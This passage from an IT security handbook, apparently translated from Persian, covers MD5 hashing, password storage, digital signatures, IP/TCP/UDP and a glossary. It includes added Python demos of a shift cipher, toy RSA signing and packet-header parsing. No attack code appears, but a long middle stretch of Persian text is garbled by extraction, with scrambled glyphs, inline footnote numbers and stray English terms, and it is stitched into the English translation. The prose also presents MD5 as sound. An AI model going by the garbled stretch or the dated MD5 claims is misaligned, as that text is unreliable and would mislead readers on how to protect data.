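        shifted.append(ch)          # spaces and periods are left alone, as in the text
    return "".join(shifted)


def shift_decrypt(text, key):
    """The same key undoes the shift, which is what makes the cipher symmetric."""
    return shift_encrypt(text, -key)


def exhaust_keys(ciphertext, known_word):
    """Try all 25 shifts and keep the keys whose output contains known_word."""
    return [k for k in range(1, 26)
            if known_word.upper() in shift_decrypt(ciphertext, k)]


def keyspace(bits):
    """Number of possible keys for a key of the given bit length."""
    return 2 ** bits


if __name__ == "__main__":
    sentence = "Security is important."
    print(encode_digits(sentence))
    print(shift_encrypt(sentence, 1))
    caesar = shift_encrypt(sentence, 3)          # Caesar's key
    print(caesar, "->", exhaust_keys(caesar, "security"))
    print(f"shift keys: 25, 128-bit keys: {keyspace(128):,}")
```

The encoding hides nothing because it has no key, and the shift cipher hides very little because its 25 keys can all be tried at once; only the 128-bit key space makes guessing impractical.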
One-way encryption using hashing

You can think of this method as similar to public key encryption in a situation where nobody has the private key. Data can therefore be encrypted but cannot be decrypted. It differs from public key encryption in that the encrypted message usually has a fixed maximum length. One of the most common one-way hashing algorithms is MD5 (Message Digest 5). The output of the MD5 algorithm is always 128 bits (16 bytes). If you create a hash code for two different messages, the probability that the two hash codes are the same is almost zero.

This method and the output code it produces have two main uses:

Integrity assurance
You can take a long document or a program, compute its MD5 code and store the code in a safe place. Some time later you can go back to your documents and perform the same operation again. If the new code differs from the earlier one, you know that the program or document has changed. Usually even a very small change in a large file causes many changes in the corresponding MD5 code.

Password storage
In many systems, when a user chooses a word as a password, the word is encrypted with the MD5 algorithm (or a similar one) and the encrypted version is stored. The next time the user tries to log in, whatever is entered is encrypted again and compared with what was stored on disk; if the two are the same, the password was correct. If the user forgets the password, it is not possible to decrypt what is stored on disk, and a new password must be chosen. The purpose of this method is that the original password can never be displayed in its original form.

Unfortunately there is still a problem, and because of it users must not choose short, simple or guessable passwords: if someone obtains a list of encrypted passwords (for example from a system that has been broken into), it is very easy to encrypt every possible simple password, match the results against the encrypted entries from the system, and so find the system's simple passwords.

Digital signature

If someone wants to send you a private message and wants you to be sure that the sender is nobody but that person, a combination of the methods described above can be used:

1. The sender writes the message and uses MD5 to create a hash code.
2. Using his or her own private key, the sender encrypts the hash code.
3. Using your public key, the sender encrypts the text of the message.
4. The sender sends the message and the encrypted hash code.
5. You receive the message.
6. Using the sender's public key, you decrypt the hash code, which yields the original hash code.
7. You decrypt the text of the message using your own private key.
8. You compute the hash code of the message text using MD5.
9. If the two hash codes are the same, you can be sure that the text has not been changed and that the sender is the person you expected.

Digital certificates, which web browsers use for secure authentication, also work on the basis of digital signature techniques (similar to the example above).
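The nine steps of the digital signature procedure above can be traced in code; the following is an added example, not part of the handbook, built on unpadded textbook RSA with small fixed primes so that it runs with the standard library alone. The key sizes, the names ALICE (sender) and BOB (recipient), the 16-byte block split and the public exponent are assumptions of this example, which shows the data flow only and is not a usable cryptosystem.

```python
"""Added example: the nine-step sign-and-encrypt exchange with textbook RSA.

The primes are well-known Mersenne primes and the RSA is unpadded, so the
keys are toy-sized. MD5 is used because the appendix names it; it is no
longer collision resistant, and current systems use SHA-256 or later.
"""
import hashlib

E = 65537    # public exponent (assumption of this example)
BLOCK = 16   # message bytes per RSA block; fits under both moduli below


def make_keypair(p, q):
    """Return (public, private) = ((n, e), (n, d)) for primes p and q."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, E), (n, pow(E, -1, phi))


def rsa(value, key):
    """Raw RSA operation; encrypts or decrypts depending on the key given."""
    n, exponent = key
    if not 0 <= value < n:
        raise ValueError("value does not fit under the modulus")
    return pow(value, exponent, n)


def md5_int(message):
    """128-bit MD5 hash code of the message text, as an integer."""
    return int.from_bytes(hashlib.md5(message.encode("utf-8")).digest(), "big")


def encrypt_text(message, public_key):
    """Encrypt the text block by block; 0x01 marks each block's true length."""
    data = message.encode("utf-8")
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    return [rsa(int.from_bytes(b"\x01" + b, "big"), public_key) for b in blocks]


def decrypt_text(blocks, private_key):
    """Decrypt each block, strip its 0x01 marker and rejoin the text."""
    out = b""
    for cipher_block in blocks:
        m = rsa(cipher_block, private_key)
        out += m.to_bytes((m.bit_length() + 7) // 8, "big")[1:]
    return out.decode("utf-8")


def send(message, sender_private, recipient_public):
    digest = md5_int(message)                               # step 1
    signed_digest = rsa(digest, sender_private)             # step 2
    ciphertext = encrypt_text(message, recipient_public)    # step 3
    return ciphertext, signed_digest                        # step 4


def receive(ciphertext, signed_digest, sender_public, recipient_private):
    claimed = rsa(signed_digest, sender_public)             # step 6
    message = decrypt_text(ciphertext, recipient_private)   # step 7
    actual = md5_int(message)                               # step 8
    return message, claimed == actual                       # step 9


ALICE_PUB, ALICE_PRIV = make_keypair(2**127 - 1, 2**89 - 1)   # sender
BOB_PUB, BOB_PRIV = make_keypair(2**107 - 1, 2**61 - 1)       # recipient

if __name__ == "__main__":
    ct, sig = send("Security is important.", ALICE_PRIV, BOB_PUB)
    print(receive(ct, sig, ALICE_PUB, BOB_PRIV))
    # Anyone holding Bob's public key can encrypt a different text, but
    # cannot produce Alice's encrypted hash code for it.
    forged = encrypt_text("Security is optional.", BOB_PUB)
    print(receive(forged, sig, ALICE_PUB, BOB_PRIV))
```

The second call decrypts cleanly but fails the comparison in step 9, which is the integrity use of the hash code and the sender check working together.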
١١١ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﺧﺪﻣﺎﺕ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ١٤٧ ﭼﻮﻥ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺭﺷﺘﻪﻫﺎﻱ ﻃﻮﻻﻧﻲ ﺍﻋﺪﺍﺩ ﺳـﺨﺖ ﺍﺳـﺖ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ )ﻛﻪ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﻧﺎﻣﻴـــﺪﻩ ﻣـــﻲﺷـــﻮﻧﺪ( ﻧﺎﻣﮕـــﺬﺍﺭﻱ ﺷـــﺪﻩﺍﻧـــﺪ .ﻧﻤﻮﻧـــﺔ ﺁﻥ www.infodev.orgﺍﺳﺖ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻦ ﻧﺎﻡ ﺭﺍ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﭘﻴﺎﻣﻲ ﺭﺍ ﺑـﻪ ﻳـﻚ ﺳـﺮﻭﻳﺲ ﺧـﺎﺹ ﺑﻨـﺎﻡ DNSﺍﺭﺳﺎﻝ ﻣﻲﻛﻨـﺪ DNS .ﻣـﻲﺗﻮﺍﻧـﺪ ﺣـﺮﻭﻑ ﺍﻟﻔﺒـﺎ ﺭﺍ ﺑـﻪ ﺷﻤﺎﺭﻩ ﺗﺒﺪﻳﻞ ﻧﻤﺎﻳﺪ )ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﺷﻤﺎﺭﻩ ﻣﻮﺭﺩ ﻧﻈﺮ 192.86.99.121 ﺍﺳـﺖ( .ﻫﻤﭽﻨﻴﻦ DNSﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺟﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻛﻪ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺟﺎﺑﺠـﺎ ﺷـﻮﺩ؛ ﭼـﻮﻥ ﺩﺍﻣﻨـﺔ ﻣﺮﺑﻮﻃـﻪ ﺁﺩﺭﺱ ﺟﺪﻳــﺪ ﺭﺍ ﺑــﻪ DNSﺍﻃــﻼﻉ ﻣــﻲﺩﻫــﺪ ﻭ ﻟــﺬﺍ ﻛــﺎﺭﺑﺮﺍﻥ ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﻤﺎﻥ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ. ١٤٨ ﺿﻤﻴﻤﺔ ۲ TCP/IP :IPﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ ١٤٩ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﺑـﻪ ﺷـﻜﻞ ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺣﺮﻭﻑ ﻭ ﻧﺸﺎﻧﻪ ﺩﺭ ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺑـﺴﺘﻪ ﻳﺎ datagramﮔﻔﺘﻪ ﻣﻲﺷـﻮﺩ IP .ﺩﺭ TCP/IPﺑـﻪ ﻣﻌﻨـﺎﻱ "ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ" ﺍﺳﺖ ﻭ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻗﺎﻟـﺐ ﺩﺍﺧﻠـﻲ ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﭼﮕﻮﻧﻪ ﺑﺎﺷﺪ .ﺑﺴﺘﺔ IPﺷﺎﻣﻞ ﭼﻨـﺪﻳﻦ ﺑﺨـﺶ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻣﻴﺎﻥ ﺁﻥ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﻧﺪ: ١٥٠ ﺁﺩﺭﺱﺩﻫﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻫﺮ ﺍﺑﺰﺍﺭ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ IPﻣﻲﺑﺎﺷﺪ .ﺍﻳﻦ ﺁﺩﺭﺱ ﺑﻄﻮﺭ ﻛﻠﻲ ﺁﻥ ﺍﺑﺰﺍﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨـﺪ؛ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺩﺭ ﺗﻤـﺎﻡ ﺩﻧﻴـﺎ ﺁﺩﺭﺱ ﺧﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺁﺩﺭﺳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻧـﺴﺨﺔ ﺟـﺎﺭﻱ TCP/IP )ﻛﻪ ﺑﻪ ﻧﺎﻡ IPv4ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻋﺪﺍﺩ ۳۲ﺑﻴﺘﻲ ﺩﻭﺩﻭﻳﻲ ﻫـﺴﺘﻨﺪ. ﻳﻌﻨﻲ ﺗﻌﺪﺍﺩ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻤﻜـﻦ ۲۳۲=۴۲۹۴۹۶۷۲۹۶ ،ﻣـﻲﺑﺎﺷـﺪ. ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻭ ﺑﺨﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺳﺎﺩﻩﺗـﺮ ﺁﻧﻬـﺎ ،ﺍﻋـﺪﺍﺩ ۳۲ﺑﻴﺘـﻲ ﺩﻭﺩﻭﻳﻲ ﺑﻪ ۴ﺑﺨـﺶ ۸ﺑﻴﺘـﻲ ﺗﻘـﺴﻴﻢﺑﻨـﺪﻱ ﺷـﺪﻩﺍﻧـﺪ .ﭼـﻮﻥ ۲۸=۲۵۶ﺍﺳﺖ ،ﻫﺮ ﺑﺨﺶ ۸ﺑﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﻲ ﺍﺯ ﺍﻋﺪﺍﺩ ۰ﺗـﺎ ﻻ ﺑﺪﻧﺒﺎﻝ ﻫﻢ ﻣﻲﺁﻳﻨﺪ ﻭ ﺑـﺎ ﻳـﻚ ۲۵۵ﺑﺎﺷﺪ .ﺍﻳﻦ ۴ﺷﻤﺎﺭﻩ ﻣﻌﻤﻮ ﹰ ﻧﻘﻄﻪ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺗﻔﻜﻴﻚ ﻣﻲﺷﻮﻧﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛـﻮﭼﻜﺘﺮﻳﻦ ﺁﺩﺭﺱ ﺍﻳﻨﺘﺮﻧﺘــﻲ 0.0.0.0ﻭ ﺑﺰﺭﮔﺘــﺮﻳﻦ ﺁﻥ 255.255.255.255 ﺍﺳﺖ .ﻧﻤﻮﻧـﺔ ﻳـﻚ ﺁﺩﺭﺱ IPﺑـﻪ ﺷـﻜﻞ 24.200.195.15 ﻣﻲ ﺑﺎﺷﺪ .ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺑﺰﺍﺭﻱ ﺑﻨﺎﻡ ﻣﺴﻴﺮﻳﺎﺏ ١٤٦ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣﺴﻴﺮ ﻫﺮ ﺁﺩﺭﺱ IPﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﺪ ﻭ ﻣﻲﺩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺩﺳﺖﻳﺎﻓﺘﻦ ﺑﻪ ﻫﺮ ﺁﺩﺭﺱ ﺑﺎﻳﺪ ﻛﺪﺍﻡ ﻣﺴﻴﺮ ﺭﺍ ﺑﺮﮔﺰﻳﺪ. 146 Router • ﺍﻧﺪﺍﺯﺓ ﺑﺴﺘﻪ؛ • ﺁﺩﺭﺱ IPﮔﻴﺮﻧﺪﻩ؛ • ﺁﺩﺭﺱ IPﻣﺤﻠﻲ ﻛﻪ ﺑﺴﺘﻪ ﺍﺯ ﺁﻧﺠﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ؛ ﻭ • ﻧﻮﻉ ﺑﺴﺘﻪ. 
ﻫﻨﮕﺎﻣﻴﻜــﻪ ﻳــﻚ ﺑــﺴﺘﻪ ﺍﺯ ﺭﺍﻳﺎﻧــﺔ ﺷــﻤﺎ ﺍﺭﺳــﺎﻝ ﻣــﻲﺷــﻮﺩ ﺑــﻪ ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﻣﺴﻴﺮﻳﺎﺏ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺁﻥ ﻧﻴﺰ ﺳﻌﻲ ﻣﻲﻛﻨـﺪ ﺑﺴﺘﻪ ﺭﺍ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ ﺑﻪ ﻣﺴﻴﺮﻳﺎﺏ ﺑﻌﺪﻱ ﺍﺭﺳﺎﻝ ﻛﻨـﺪ ﻭ ﺍﻳـﻦ ﻛﺎﺭ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺑﺴﺘﻪ ﺑﻪ ﻣﻘﺼﺪ ﺧﻮﺩ ﺑﺮﺳـﺪ .ﺍﮔـﺮ ﻣـﺸﻜﻠﻲ ﺑﻮﺟﻮﺩ ﺁﻳﺪ ﻳﺎ ﺗﺮﺍﻛﻢ ﺑﺴﺘﻪﻫﺎ ﺯﻳﺎﺩ ﺑﺎﺷﺪ ﺑﺴﺘﻪ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺍﺭﺳـﺎﻝ ﺷﻮﺩ ﻭ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ ﻣﺘﻮﻗﻒ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴـﻞ ﺑـﻪ IP ﭘﺮﻭﺗﻜﻞ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ١٥١ﻣﻲﮔﻮﻳﻨﺪ .ﺍﮔﺮﭼـﻪ ﻃﺒـﻖ ﺗﺌـﻮﺭﻱ Domain Name Services Hostname Internet Protocol Packet Unreliable Protocol 147 148 149 150 151 ﺑﺨﺶ ﺩﻭﻡ ﭘﺮﻭﺗﻜــﻞ TCP/IPﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ ﺍﺳــﺖ ﻛــﻪ ﺗﻤــﺎﻡ ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ .ﺍﮔﺮﭼـﻪ ﻧﻴـﺎﺯﻱ ﻧﻴﺴﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺭﺑـﺎﺭﺓ TCP/IPﺍﻃﻼﻉ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ ،ﺍﻣـﺎ ﺑﺎﻳـﺪ ﺩﺭﺑـﺎﺭﺓ ﭘﻴﻜـﺮﺑﻨـﺪﻱ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻄﺎﻟﺒﻲ ﺑﺪﺍﻧﻨﺪ .ﺩﺭ ﺍﺩﺍﻣـﻪ ﺷﺮﺡ ﺳﺎﺩﻩﺍﻱ ﺍﺯ ﻋﻤﻠﻜﺮﺩ TCP/IPﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ .ﺍﮔﺮ ﺑﺎ ﺍﻳﻦ ﻣﻔﺎﻫﻴﻢ ﺁﺷﻨﺎ ﻫﺴﺘﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺧﻮﺍﻧﺪﻥ ﺍﻳﻦ ﻗﺴﻤﺖ ﺻـﺮﻓﻨﻈﺮ ﻛﻨﻴﺪ. ١١٢ ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ IPﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺗﻤﺎﻣﻲ ﺑﺴﺘﻪﻫـﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺑﻪ ﻣﻘﺼﺪ ﻣﻲﺭﺳﺎﻧﺪ. ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ ﺍﻣﺎ ﺩﺭ ﺍﻳﻨﺠﺎ ﺗﻨﻬﺎ ﺑﻪ ﺩﻭ ﻧﻮﻉ ﺍﺯ ﺁﻧﻬﺎ ﺍﺷـﺎﺭﻩ ﻣـﻲﻛﻨـﻴﻢ TCP :ﻭ .UDP :TCPﭘﺮﻭﺗﻜﻞ ﻛﻨﺘﺮﻝ ﺍﻧﺘﻘﺎﻝ ١٥٢ TCPﭘﺮﻭﺗﻜﻠﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﻴﺸﺘﺮ ﭘﻴﺎﻣﻬﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺷﺎﻣﻞ ﻭﺏ ) ،(HTTPﭘﺮﻭﺗﻜـــﻞ ﺍﻧﺘﻘـــﺎﻝ ﻓﺎﻳـــﻞ ) ١٥٣(FTPﻭ ﻧﺎﻣـــﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﺑﺎﺷﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺩﺍﺩﺓ ﺍﺭﺳـﺎﻝﺷـﺪﻩ ،ﺑـﺴﺘﻪ ﻫـﺎﻱ TCPﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻫﻢ ﻣﻲﺑﺎﺷﻨﺪ: ١٥٤ • ۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺍﺭﺳﺎﻟﻲ؛ • ۱۶ﺑﻴﺖ ﺷﻤﺎﺭﺓ ﭘﻮﺭﺕ ﺩﺭﻳﺎﻓﺘﻲ؛ • ﺍﻃﻼﻋﺎﺕ ﺗﺮﺗﻴﺒﻲ ١٥٦ﺑﺴﺘﻪﻫﺎ؛ ﻭ • ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻘﻲ. 
Since each computer has only one IP address, the port number is used to indicate the program on the computer that is sending or receiving the message. This is what makes it possible to have several web browsers open on a computer and to view the requested pages through them. For a program to receive a TCP message it must wait for the message on the correct port. Usually there is a specific port for each particular application. For example, the port of a web server is always port number 80. When you open a browser window, it chooses a port for itself more or less at random (by convention, greater than 1023), and this is the port on which it must wait for messages.

Because the length of IP packets is limited and the information transferred by applications may be far larger, the information must be divided into smaller parts. Each part is sent in its own TCP packet. The sequencing information sent with the parts allows the receiving program to reassemble them in the correct order. For various reasons, however, some packets may reach the destination sooner than others, which means that packets must be able to be received out of the order in which they were sent. On the other hand, since IP is by nature unreliable in theory, some packets may never reach the destination. In that case the receiving program notices that a gap has occurred in the sequence of received packets and can request that the lost packet be sent again.
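The IP and TCP header fields listed in this appendix are the values a packet filter or firewall inspects, and the sequence numbers are what let a receiver reorder segments and notice a gap. The following Python code is an added example, not part of the handbook: it parses those fields from constructed packets and reassembles segments that arrive out of order. The payload, the source port 49152 and the starting sequence number 1000 are made-up sample values; the two addresses are the handbook's own examples.

```python
import ipaddress
import struct

PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}  # IP "protocol" field = packet type


def parse_ipv4_tcp(packet: bytes) -> dict:
    """Extract the IP and TCP header fields named in the text from raw bytes."""
    if len(packet) < 20:
        raise ValueError("shorter than the minimum IPv4 header")
    (ver_ihl, _tos, total_len, _ident, _frag, _ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    # Reject headers whose declared lengths do not fit the bytes we were given.
    if version != 4 or ihl < 20 or not ihl <= total_len <= len(packet):
        raise ValueError("malformed IPv4 header")
    info = {
        "size": total_len,                                  # size of the packet
        "src": str(ipaddress.IPv4Address(src)),             # sender address
        "dst": str(ipaddress.IPv4Address(dst)),             # recipient address
        "type": PROTOCOLS.get(proto, f"protocol {proto}"),  # type of packet
    }
    if proto == 6:
        tcp = packet[ihl:total_len]
        if len(tcp) < 20:
            raise ValueError("truncated TCP header")
        sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
        data_off = (off_flags >> 12) * 4
        if not 20 <= data_off <= len(tcp):
            raise ValueError("bad TCP data offset")
        info.update(src_port=sport, dst_port=dport, seq=seq, ack=ack,
                    payload=tcp[data_off:])
    return info


def reassemble(segments, first_seq):
    """Put (seq, payload) pairs back in order by sequence number.

    Returns (data, gap): the bytes that can be delivered in order, and the
    sequence number still missing while later segments wait (None if no gap).
    Simplification: segments are assumed not to overlap partially.
    """
    pending = {seq: data for seq, data in segments if data}  # duplicates collapse
    expected, out = first_seq, bytearray()
    while expected in pending:
        chunk = pending.pop(expected)
        out += chunk
        expected = (expected + len(chunk)) % 2**32  # sequence numbers are 32-bit
    return bytes(out), (expected if pending else None)


def build_packet(src, dst, sport, dport, seq, payload):
    """Build a constructed IPv4+TCP packet (checksums left at 0, not verified)."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, 0,
                      (5 << 12) | 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src).packed,
                     ipaddress.IPv4Address(dst).packed)
    return ip + tcp


def sample_packets():
    """Constructed capture: one request in three segments, arriving 3rd, 1st, 2nd."""
    parts = [b"GET /index.html ", b"HTTP/1.0\r\n", b"Host: www.infodev.org\r\n\r\n"]
    seq, pkts = 1000, []
    for part in parts:
        pkts.append(build_packet("24.200.195.15", "192.86.99.121",
                                 49152, 80, seq, part))
        seq += len(part)
    return [pkts[2], pkts[0], pkts[1]]


if __name__ == "__main__":
    infos = [parse_ipv4_tcp(p) for p in sample_packets()]
    for i in infos:
        print(i["type"], i["src"], i["src_port"], "->", i["dst"], i["dst_port"],
              "seq", i["seq"], "size", i["size"])
    segs = [(i["seq"], i["payload"]) for i in infos]
    print("all segments:", reassemble(segs, 1000))
    print("second segment lost:", reassemble([segs[0], segs[1]], 1000))
```

A receiver that sees a non-empty gap value would hold the later segments and wait for the missing one to be retransmitted, which is the behaviour the text describes.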
When a sender sends a TCP packet, the receiving program is expected to acknowledge its receipt by sending back special acknowledgement information. If the acknowledgement for a packet does not come back within a specified interval, the packet is sent again. Because of the packets' sequence and acknowledgement numbers, TCP is a reliable protocol, and when an application uses it, the user can be confident that if an error or fault occurs in transmitting or receiving the information, the software will be made aware of it.

UDP: User Datagram Protocol

UDP is a simple format used for transferring information. In addition to the data, each UDP packet also carries other information, including:

• a 16-bit sending port number; and
• a 16-bit receiving port number.

As with TCP, the use of port numbers means that different programs can receive and send UDP streams in parallel. Also, as with receiving a message in TCP, the program must wait for the message on the correct port. UDP has no particular provision for sequencing and acknowledging packets, so this protocol, like IP, is unreliable and messages may be lost. UDP is used where losing some messages does not matter much, or where there is a simple way to recover lost messages. One advantage of the protocol, however, is that because UDP has no acknowledgement or sequencing, it uses far fewer system resources.

Appendix 3: Glossary of Technical Terms

Definitions of terms used in security texts

Email
The computer equivalent of postal mail. Electronic addresses can send or receive mail over the Internet. From the Internet's point of view, all e-mail consists of printable text (non-control ASCII characters).

Denial of Service
A denial-of-service attack occurs when a computer connected to the Internet is bombarded with a very large number of bogus messages, so that it spends all its time responding to these messages and no capacity is left for real user traffic.

Keyloggers
A program that records everything typed on the keyboard. The data can be written to disk or sent over the Internet to someone else. If keyloggers are installed on a computer, everything entered into it, such as usernames and passwords, is recorded; it is exactly as if someone were standing over your shoulder while you enter your username and password!

Backdoor
A method of bypassing the normal, secure login to a system and gaining control of a computer without the owner's permission. If a backdoor is installed on a computer connected to a network, anyone on the Internet may be able to enter it and take control of it without the owner's knowledge and consent.

Firewall
A firewall can block unexpected and unauthorized exchange of information between you and the outside world. There are two kinds of firewall: a firewall can be software that runs on your computer, or a separate piece of hardware that watches what is received and sent on the network.

Encryption
A method of hiding the content of information so that it cannot easily be read except by the person meant to receive it. In encryption there is a "key", generated according to a set of rules, which is used to change the appearance of the information. The information can be read only once it has been decrypted, and to decrypt it the recipient must know both the key and how to use it.

Buffer Overflow
A software flaw that occurs when a program moves its data into a space in memory that does not have enough room for the data. In this situation the program may push earlier data out of memory in trying to make room for the new data. Loss of this data can cause many problems and usually compromises the integrity and security of the program. The problem can be prevented by checking that there is enough memory space before moving data into it.

Identity Theft
Identity theft occurs when someone has gathered enough information about you to be able to pass themselves off as you (for example at banks, shops or government agencies).

Attachment
An attachment is a part of an e-mail message that can be used to transfer various kinds of files, such as text and image files. All non-text files must be converted to printable form (plain text) before they are sent. Everything stored on a computer is a combination of the digits 0 and 1. Put simply, encoding makes these zeros and ones sendable by converting them to plain text.

Username & Password
A confidential username and password that identify and authenticate a user to a computer system or website.

Open-Source Software
Software whose source code is publicly available and which anyone may freely modify and change. Because the source code is available, people can see how it works and change it as they wish. The authors of open-source programs usually encourage other programmers to take part in developing and extending the programs' capabilities. Open-source programs also include free software, and many open-source programs, whether free of charge or sold, have capabilities similar to those of proprietary software that may be expensive. Open-source programs are sometimes used, under special agreements and licences and for a fee, in parts of commercial programs. For more information, see the following sites:
http://www.fsf.org
http://www.opensource.org

Backup
The process of copying a computer's files to other locations on the same computer or to peripheral devices that may be independent of that computer. Backups let you recover data that have been lost for any reason (for example, accidentally deleted, physically damaged, or stolen).

Spam
Advertisements and other e-mail messages that are sent to you without your having asked for them.

Virus
The term "virus" has a specific meaning that is discussed further in later sections. At present, "virus" is applied to the whole set of programs that appear on your computer, may spread to other computers, and may do them serious harm.

URL (Universal Resource Locator)
A universal address for pointing to a destination on the Internet, for example http://www.infodev.org/ or mailto:info@worldbank.org

Cookie
